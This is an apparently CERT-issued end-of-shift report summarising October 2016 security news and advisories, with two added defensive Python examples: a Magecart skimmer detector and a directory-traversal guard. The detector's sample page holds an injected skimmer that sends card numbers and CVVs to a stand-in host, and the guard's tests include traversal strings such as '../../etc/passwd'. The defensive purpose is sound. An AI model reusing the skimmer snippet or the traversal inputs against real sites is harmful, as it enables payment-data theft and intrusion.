End-of-Shift report
Timeframe: Thursday 06-10-2016 18:00 − Friday 07-10-2016 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
Fake Bank Austria "security certificate" is malware
In a fake Bank Austria message with the subject line "Sicherheitszertifikat" (security certificate), criminals claim that recipients must install a program on their smartphone, supposedly so they can keep using their online banking account. In reality the program is malware.
https://www.watchlist-internet.at/schadsoftware/gefaelschtes-bank-austria-sicherheitszertifikat-ist-schadsoftware/
Upcoming Security Updates for Adobe Acrobat and Reader (APSB16-33)
A prenotification Security Advisory (APSB16-33) has been posted regarding upcoming releases for Adobe Acrobat and Reader scheduled for Tuesday, October 11, 2016. We will continue to provide updates on the upcoming releases via the Security Advisory as well as the Adobe...
https://blogs.adobe.com/psirt/?p=1405
100+ online shops compromised with payment data-stealing code
Since March 2016 (and possibly even earlier), someone has been compromising a variety of online shops and injecting them with malicious JavaScript code that exfiltrates payment card and other kinds of information users entered to pay for their shopping. According to RiskIQ and ClearSky researchers, the campaign - which they dubbed Magecart - is still ongoing, albeit at a reduced scope and pace. Since March, the threat actor behind it has compromised more than 100...
https://www.helpnetsecurity.com/2016/10/07/payment-data-stealing-code/
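The Magecart pattern described above (JavaScript injected into a shop page that reads the payment form and ships the values to an attacker-controlled host) can be triaged statically from a saved copy of the checkout page. The following Python script is an added example, not code from the article, from RiskIQ or from ClearSky; the first-party host allowlist, the indicator patterns and the sample checkout page are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the shop legitimately loads scripts from / sends data to (constructed).
FIRST_PARTY_HOSTS = {"shop.example", "static.shop.example"}

# Field names a card skimmer typically reads, and primitives it uses to send them out.
CARD_FIELD_RE = re.compile(
    r"(card.?number|ccnum|cvv|cvc|exp(ir|_)?(y|month|year|date)|\bpan\b)", re.I)
EXFIL_RE = re.compile(
    r"(XMLHttpRequest|fetch\s*\(|sendBeacon|new\s+Image|\.src\s*=|WebSocket)", re.I)
URL_RE = re.compile(r"""https?://[^\s'"\\)]+""", re.I)


class _ScriptCollector(HTMLParser):
    """Collects external <script src> URLs and inline <script> bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def _is_foreign(url):
    """True if the URL points at a host outside the first-party allowlist."""
    host = urlparse(url).hostname
    return host is not None and host.lower() not in FIRST_PARTY_HOSTS


def find_skimmer_indicators(html):
    """Return (kind, detail) findings for a checkout page.

    'external-script': a <script src> loaded from a host not in the allowlist.
    'inline-skimmer' : inline JS that references card fields, uses an exfiltration
                       primitive and names a foreign URL. Heuristic triage only.
    """
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    findings = []
    for src in p.external:
        if _is_foreign(src):
            findings.append(("external-script", src))
    for body in p.inline:
        if not (CARD_FIELD_RE.search(body) and EXFIL_RE.search(body)):
            continue
        targets = [u for u in URL_RE.findall(body) if _is_foreign(u)]
        if targets:
            findings.append(("inline-skimmer", targets[0]))
    return findings


# Constructed sample: one relative script, one allowlisted CDN script, one benign
# inline validator and one injected skimmer modelled on the pattern in the article.
SAMPLE_CHECKOUT_PAGE = """
<html><body>
<form id="payment"><input name="cardnumber"><input name="cvv"></form>
<script src="/js/checkout.js"></script>
<script src="https://static.shop.example/jquery.js"></script>
<script>
  // legitimate: length check on the card number, nothing leaves the page
  function luhnOk(n) { return n.length >= 12; }
</script>
<script>
  document.getElementById('payment').addEventListener('submit', function () {
    var d = JSON.stringify({n: document.forms.payment.cardnumber.value,
                            c: document.forms.payment.cvv.value});
    var i = new Image(); i.src = 'https://cdn-stats.evil.test/collect?d=' + btoa(d);
  });
</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in find_skimmer_indicators(SAMPLE_CHECKOUT_PAGE):
        print(kind, detail)
```

The benign validator mentions the card number but has no way to send data off the page, so it is not reported; the injected handler is reported together with the foreign collection URL. Real skimmers are usually obfuscated, so this kind of pattern check is a first pass; comparing the live page's script inventory against a known-good baseline catches what regexes miss.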
Background: Analysed: Ad bludgeon instead of gems - Android malware CallJam dissected
Despite various security checks, malware keeps sneaking into Google's app store. One such sample poses as a supposed helper for the hugely successful game "Clash Royale".
https://heise.de/-3340267
Lovoo: vulnerability enables creation of movement profiles
Until recently, information about users could be retrieved via the dating service's web API, even without logging in. With scripted automation this can be used to build movement profiles.
http://www.golem.de/news/lovoo-sicherheitsluecke-ermoeglicht-erstellung-von-bewegungsprofilen-1610-123642-rss.html
Positive Technologies: Security Trends & Vulnerabilities Review Industrial Control Systems (PDF)
This study examines components of ICS from different vendors. In the period from 2012 to 2015, a total of 743 vulnerabilities were discovered in ICS components; most of them were detected in products from well-known companies: Siemens, Schneider Electric, and Advantech. Most vulnerabilities are of either high or medium risk (47% high, 47% medium). ... Summary: The study shows that the number of vulnerable ICS components is not reducing from year to year. Nearly half of identified...
https://www.ptsecurity.com/upload/iblock/6bd/ics_vulnerability_2016_eng.pdf
An attachment that wasn't there
By Slavo Greminger and Oli Schacher | On a daily basis we collect tons of Spam emails, which we analyze for malicious content. Of course, this is not done manually by our thousands of minions, but automated using some Python-fu. Python...
https://securityblog.switch.ch/2016/10/07/an-attachment-that-wasnt-there/
Security updates: attackers can hijack Cisco switches
The network equipment vendor is addressing two vulnerabilities rated critical in switches of the Nexus series and is distributing security patches for 15 further vulnerabilities in various products.
https://heise.de/-3342846
OS X El Capitan: waiting for the big security update
Apple's new operating system macOS Sierra closes numerous holes that are present in the previous version. But the vendor has not yet published a separate update for OS X El Capitan.
https://heise.de/-3342343
Malware could record video and audio from the Mac
Security researcher Patrick Wardle has developed a demo exploit that can capture camera and microphone data while chats are running.
https://heise.de/-3342336
VMSA-2016-0015 VMware Horizon View updates address directory traversal vulnerability (CVE-2016-7087)
Severity: Important VMware Horizon View contains a vulnerability that may allow for a directory traversal on the Horizon View Connection Server. Exploitation of this issue may lead to a partial information disclosure.
https://www.vmware.com/security/advisories/VMSA-2016-0015.html
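Directory traversal of the kind the VMware advisory classifies is, in general, a failure to confine a client-supplied path to its intended base directory. The following Python guard is an added example of the standard mitigation, not VMware's code and not a description of the Horizon View flaw; the base directory and the request paths are constructed for illustration.

```python
from pathlib import Path
from urllib.parse import unquote


def resolve_under(base_dir, requested):
    """Map a client-supplied path onto base_dir, or raise if it would escape it.

    - percent-decodes once, so an encoded %2e%2e is treated like '..'
    - rejects embedded NUL bytes, which some lower layers silently truncate on
    - strips leading slashes so an absolute path cannot replace base_dir
    - resolves symlinks and '..' segments, then checks that the result is
      still inside the resolved base directory
    """
    decoded = unquote(requested)
    if "\x00" in decoded:
        raise ValueError("NUL byte in requested path")
    base = Path(base_dir).resolve()
    target = (base / decoded.lstrip("/\\")).resolve()
    try:
        target.relative_to(base)
    except ValueError:
        raise PermissionError(f"{requested!r} escapes {base}") from None
    return target


def is_safe_request(base_dir, requested):
    """Boolean wrapper around resolve_under for use in a request filter."""
    try:
        resolve_under(base_dir, requested)
        return True
    except (PermissionError, ValueError):
        return False


if __name__ == "__main__":
    # Constructed base directory and requests; the last four must be refused.
    for req in ["css/site.css", "/css/site.css", "../../etc/passwd",
                "css/../../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd",
                "css/site.css\x00.png"]:
        print(repr(req), "->", "allowed" if is_safe_request("/srv/www/static", req) else "refused")
```

The check is done on the fully resolved path rather than on the string, so a symlink inside the base directory that points outside it is refused as well. Decode only once: decoding in a loop re-opens the double-encoding bypass the single decode is there to close.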
IDM 4.5 One SSO Provider (OSP) 6.0.0.5
Abstract: This hotfix provides enhancements and software fixes for the One SSO Provider for Identity Manager. For more information about these updates, see the hotfix details.
Document ID: 5256490
Security Alert: Yes
Distribution Type: Public
Entitlement Required: No
Files: IDM45-OSP60-HF-5.zip (23.28 MB)
Products: Identity Manager 4.5, Access Review 1.1, Access Review 1.5
Superseded Patches: IDM 4.5 One SSO Provider (OSP)
https://download.novell.com/Download?buildid=Z0jKqCEDM7k~
Atlassian HipChat Secret Key Disclosure
Topic: Atlassian HipChat Secret Key Disclosure
Risk: Medium
Text: This email refers to the following advisory pages:
* Bitbucket Server - https://confluence.atlassian.com/x/0QkcMg
* Conflue...
https://cxsecurity.com/issue/WLB-2016100066
DFN-CERT-2016-1653: KDE: Multiple vulnerabilities in KMail allow, among other things, execution of arbitrary code
https://portal.cert.dfn.de/adv/DFN-CERT-2016-1653/
GE Bently Nevada 3500/22M Improper Authorization Vulnerability
This advisory was originally posted to the US-CERT secure Portal library on September 8, 2016, and is being released to the NCCIC/ICS-CERT web site. This advisory contains mitigation details for an improper authorization vulnerability in the GE Bently Nevada 3500/22M monitoring system.
https://ics-cert.us-cert.gov/advisories/ICSA-16-252-01
IBM Security Bulletins
IBM Security Bulletin: IBM WebSphere Dashboard Framework is affected by a security vulnerability in Apache POI (CVE-2016-5000)
http://www.ibm.com/support/docview.wss?uid=swg21991850
IBM Security Bulletin: IBM Web Experience Factory is affected by a security vulnerability in Apache POI (CVE-2016-5000)
http://www-01.ibm.com/support/docview.wss?uid=swg21991851
IBM Security Bulletin: IBM WebSphere Dashboard Framework is affected by multiple security vulnerabilities in Apache POI
http://www-01.ibm.com/support/docview.wss?uid=swg21991839
IBM Security Bulletin: IBM Web Experience Factory is affected by multiple security vulnerabilities in Apache POI
http://www-01.ibm.com/support/docview.wss?uid=swg21991845
IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Rational Performance Tester (CVE-2016-3485)
http://www.ibm.com/support/docview.wss?uid=swg21991877
IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Rational Service Tester (CVE-2016-3485)
http://www.ibm.com/support/docview.wss?uid=swg21991879
IBM Security Bulletin: IBM Streams is affected by Open Source Apache Xerces-C XML parser Vulnerabilities (CVE-2016-4463)
http://www-01.ibm.com/support/docview.wss?uid=swg21991111
IBM Security Bulletin: IBM Streams is affected by Libxml2 vulnerabilities (CVE-2016-4447, CVE-2016-4448, CVE-2016-4449)
http://www-01.ibm.com/support/docview.wss?uid=swg21991061
IBM Security Bulletin: IBM Streams may be impacted by a vulnerability in WebSphere Liberty (CVE-2016-2923)
http://www-01.ibm.com/support/docview.wss?uid=swg21991058
IBM Security Bulletin: IBM Streams is affected by Open Source Apache Xerces-C XML parser Vulnerabilities (CVE-2016-0729)
http://www-01.ibm.com/support/docview.wss?uid=swg21991112